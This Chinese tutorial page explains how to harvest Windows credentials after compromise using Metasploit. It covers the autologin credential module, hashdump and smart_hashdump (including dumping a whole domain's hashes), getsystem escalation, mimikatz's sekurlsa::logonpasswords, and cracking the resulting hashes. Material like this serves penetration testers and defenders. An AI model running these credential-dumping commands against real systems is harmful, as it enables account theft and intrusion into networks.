目录
获取用户密码
抓取自动登录的密码
导出密码哈希
上传mimikatz程序
加载kiwi模块
加载mimikatz模块
获取用户密码

抓取自动登录的密码
1:很多用户习惯将计算机设置自动登录,可以使用
run windows/gather/credentials/windows_autologin
抓取自动登录的用户名和密码

导出密码哈希
2:hashdump 模块可以从SAM数据库中导出本地用户账号,执行:run hashdump ,该命令的使用需要系统权限

用户哈希数据的输出格式为:
代码语言:javascript代码运行次数:0运行复制
用户名:SID:LM哈希:NTLM哈希:::所以我们得到了三个用户账号,分别为Administrator、Guest和小谢。
其中Administrator和Guest的LM哈希(aad3b435b51404eeaad3b435b51404ee)和NTLM哈希(31d6cfe0d16ae931b73c59d7e0c089c0)对应的是一个空密码。所以,只有小谢的哈希有效。
黑点工具
在线工具导航网站,免费使用无需注册,快速使用无门槛。
18 查看详情
![]()
接下来要处理的就是用户小谢 的密码( a86d277d2bcd8c8184b01ac21b6985f6 )了。我们可以使用类似John这样的工具来破解密码:John破解Windows系统密码,或者使用在线网站解密:https://www.cmd5.com/default.aspx
还可以使用命令:run windows/gather/smart_hashdump ,该命令的使用需要系统权限。该功能更强大,如果当前用户是域管理员用户,则可以导出域内所有用户的hash
上传mimikatz程序
3:我们还可以通过上传mimikatz程序,然后执行mimikatz程序来获取明文密码。
执行mimikatz必须System权限。
我们先getsystem提权至系统权限,然后执行 execute -i -f mimikatz.exe ,进入mimikatz的交互界面。然后执行:
privilege::debugsekurlsa::logonpasswords
加载kiwi模块
4:加载kiwi模块,该模块的使用需要System权限。关于该模块的用法:
工具的使用 | MSF中kiwi模块的使用
加载mimikatz模块
5:或者运行MSF里面自带的 mimikatz 模块 ,该模块的使用需要System权限。传送门:工具的使用|MSF中mimikatz模块的使用。目前该模块已经被kiwi模块代替了。
以上就是工具的使用|MSF中获取用户密码的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/400332.html
微信扫一扫
支付宝扫一扫